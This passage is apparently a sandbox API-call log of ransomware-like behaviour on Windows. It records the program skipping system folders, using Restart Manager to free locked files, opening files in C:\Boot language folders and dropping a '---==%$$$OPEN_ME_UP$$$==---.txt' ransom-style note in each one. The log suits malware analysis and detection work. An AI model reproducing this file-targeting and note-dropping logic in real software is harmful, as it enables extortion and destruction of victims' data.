ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606320 [0066.856] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.856] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.856] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.856] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.856] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.856] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0066.856] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.856] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0066.856] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.856] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.856] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.856] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.856] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.856] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0066.856] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.856] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.856] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0066.856] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0066.857] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0066.857] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0066.858] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0066.858] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0066.858] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0066.858] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0066.858] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.858] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0066.858] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0066.858] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.858] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0066.858] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0066.858] RmStartSession () returned 0x0 [0066.861] RmRegisterResources () returned 0x0 [0066.865] RmGetList () returned 0x0 [0066.976] RmEndSession () returned 0x0 [0067.132] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0067.132] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0067.132] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0067.132] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0067.132] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0067.132] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0067.132] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0067.132] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui") returned 33 [0067.132] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0067.132] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.132] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0067.132] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0067.132] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.133] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0067.133] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0067.133] RmStartSession () returned 0x0 [0067.135] RmRegisterResources () returned 0x0 [0067.151] RmGetList () returned 0x0 [0067.357] RmEndSession () returned 0x0 [0067.454] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0067.454] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0067.454] FindClose (in: hFindFile=0x606320 | out: hFindFile=0x606320) returned 1 [0067.454] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0067.454] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\da-dk\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.505] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0067.506] CloseHandle (hObject=0x430) returned 1 [0067.506] GetProcessHeap () returned 0x5e0000 [0067.506] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0067.506] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0067.506] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0067.506] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0067.506] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0067.506] lstrcmpiW (lpString1="de-DE", lpString2="Program Files") returned -1 [0067.506] lstrcmpiW (lpString1="de-DE", lpString2="Program Files (x86)") returned -1 [0067.506] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0067.506] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0067.506] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0067.506] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.506] GetProcessHeap () returned 0x5e0000 [0067.506] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0067.507] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0067.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6062a0 [0067.507] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.507] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.507] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.507] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.507] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.507] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0067.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.507] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.507] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.507] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.507] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.507] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.507] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0067.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.507] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0067.507] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0067.507] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0067.507] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0067.507] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0067.507] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0067.507] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0067.507] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0067.507] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.507] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0067.508] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0067.508] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.508] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0067.508] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0067.508] RmStartSession () returned 0x0 [0067.511] RmRegisterResources () returned 0x0 [0067.515] RmGetList () returned 0x0 [0067.844] RmEndSession () returned 0x0 [0068.019] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0068.019] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0068.019] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0068.019] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0068.019] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0068.019] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0068.019] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0068.019] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui") returned 33 [0068.019] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0068.019] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.019] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0068.019] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0068.019] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.019] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0068.019] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0068.019] RmStartSession () returned 0x0 [0068.022] RmRegisterResources () returned 0x0 [0068.026] RmGetList () returned 0x0 [0068.235] RmEndSession () returned 0x0 [0068.314] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0068.314] FindNextFileW (in: hFindFile=0x6062a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0068.314] FindClose (in: hFindFile=0x6062a0 | out: hFindFile=0x6062a0) returned 1 [0068.315] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0068.315] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\de-de\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.316] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0068.317] CloseHandle (hObject=0x430) returned 1 [0068.317] GetProcessHeap () returned 0x5e0000 [0068.317] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0068.317] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0068.318] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0068.318] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0068.318] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0068.318] lstrcmpiW (lpString1="el-GR", lpString2="Program Files") returned -1 [0068.318] lstrcmpiW (lpString1="el-GR", lpString2="Program Files (x86)") returned -1 [0068.318] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0068.318] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0068.318] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0068.318] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.318] GetProcessHeap () returned 0x5e0000 [0068.318] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0068.318] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0068.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606420 [0068.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.318] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.318] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.318] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0068.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.318] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.318] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.318] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.318] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0068.318] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.318] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0068.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0068.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0068.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0068.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0068.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0068.319] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0068.319] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0068.319] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.319] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0068.319] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0068.319] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.319] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0068.319] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0068.319] RmStartSession () returned 0x0 [0068.322] RmRegisterResources () returned 0x0 [0068.326] RmGetList () returned 0x0 [0068.480] RmEndSession () returned 0x0 [0068.576] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0068.576] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0068.576] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0068.576] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0068.576] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0068.576] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0068.576] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0068.576] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui") returned 33 [0068.576] StrStrIW 